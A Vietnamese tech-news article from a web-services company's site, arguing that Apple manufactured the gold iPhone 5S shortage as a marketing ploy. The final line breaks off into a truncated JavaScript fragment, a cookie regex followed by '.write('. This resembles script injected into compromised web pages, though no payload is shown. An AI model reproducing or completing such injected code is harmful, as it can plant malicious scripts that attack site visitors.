Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > Có phải Apple đang tạo cơn sốt cho iPhone 5S màu vàng?

Có phải Apple đang tạo cơn sốt cho iPhone 5S màu vàng?

Các cửa hàng Apple Store tại Mỹ, Úc, châu Á liên tục công bố chiếc iPhone 5S màu vàng đã hết hàng hoặc chỉ có những nơi chỉ có đúng 20 chiếc. Chính điều này đã làm không ít người tỏ ra hoài nghi về khả năng hiếm hàng này của nhà sản xuất smartphone hàng đầu thế giới.

iPhone 5S màu vàng khan hàng một cách kỳ lạ

Theo tờ Business Insider cho hay, có rất nhiều lý do để chúng ta tin rằng đây chỉ là một chiến dịch tiếp thị có chủ đích của những tài năng Marketing của Apple.

Theo đó, nhiều tờ báo cũng đã đưa tin rằng iPhone 5S màu vàng luôn trong tình trạng khan hiếm hàng và có vấn đề thiếu hụt nguồn cung.

Điều này thật sự rất vô lý, bởi iPhone 5S màu vàng không phải có vỏ bọc được làm từ vàng thật, nó chỉ là một loại chất liệu nhôm (Ulanium) màu vàng mà thôi. Trong khi đó, giá nhôm vật liệu đã giảm xuống tại thời điểm mà Apple đã lên kế hoạch cho iPhone mới thì việc thiếu hụt nguồn cung cấp nguyên liệu nhôm là một điều không thể chấp nhận được.

Bảng giá nhôm vật liệu đã giảm xuống đáng kể

Các chuyên gia Marketing của Apple chắc chắn không phải là những kẻ ngờ nghệch, bởi họ hoàn toàn có đủ khả năng để ước tính tổng lượng nhu cầu của người dùng trước khi họ giới thiệu sản phẩm mới.

Một điều trớ trêu thay là iPhone 5C không hề có sự thiếu hụt. Cũng không có ai phàn nàn rằng họ không thể có được một chiếc iPhone 5S màu xanh. Trong khi đó, giá nhựa công nghiệp lại tăng lên trong khoảng thời gian nói trên. Nhưng bằng mọi cách, Apple vẫn đáp ứng đầy đủ nhu cầu của người dùng.

Trong khi đó giá nhựa công nghiệp lại tăng lên, dù vậy nhưng iPhone 5S lại khan hàng

Ở thời điểm hiện tại, những người dùng tại Mỹ, Úc và các thuê bao của nhà mạng O2 đều tỏ ra rất thất vọng khi họ đã không sở hữu được một chiếc iPhone 5S màu vàng. Nhà mạng Verizon tại 100 Wall Street, O2 và các Apple Store tại Úc đều đưa ra thông báo rằng chẳng còn chiếc iPhone màu vàng nào. Còn cửa hàng Apple Store tại Francisco thì thông báo chỉ còn 20 chiếc.

Đây có thể chỉ là do Apple đã có toan tính trong việc tạo ra một cơn sốt khan hiếm nguồn cung để kích thích lượng mua người dùng trên thị trường.

Hiện tại trên eBay, giá của iPhone 5S màu vàng được bán ra là 100 USD, mức giá này cao hơn rất nhiều so với giá mà Apple công bố. Và Business Insider đã dự báo từ tuần trước rằng, chiếc iPhone màu vàng này sẽ khiến sự phân chia giàu nghèo một cách rõ rệt hơn.

Đây là tình trạng hiện của phiên bản iPhone 5S màu vàng. Bạn đang có ý định sẽ mua cho mình một chiếc smartphone như vậy mặc dù bạn chưa đủ tiền để mua nó, nhưng chính vì vậy nên bạn mới càng mong muốn được nó để trải nghiệm những gì mới mẻ nhất. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘